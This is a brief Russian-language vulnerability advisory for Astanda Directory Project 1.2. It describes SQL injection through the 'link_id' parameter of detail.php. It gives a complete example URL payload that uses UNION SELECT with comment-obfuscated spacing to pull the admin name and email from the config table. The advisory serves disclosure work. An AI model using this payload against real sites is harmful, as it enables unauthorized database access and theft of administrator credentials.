Программа: Astanda Directory Project 1.2

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «link_id» сценарием detail.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Пример:

http://[target].com/[path]/detail.php?link_id=-1/**/union/**/all/**/select/* */1,concat(0x3C68313E557365723A203C2F68313E, admin,0x3C68313E456D61696C3A203C2F68313E,email), null,null,0,0,1,1,1,1,0/**/from/**/config/*



Оставить мнение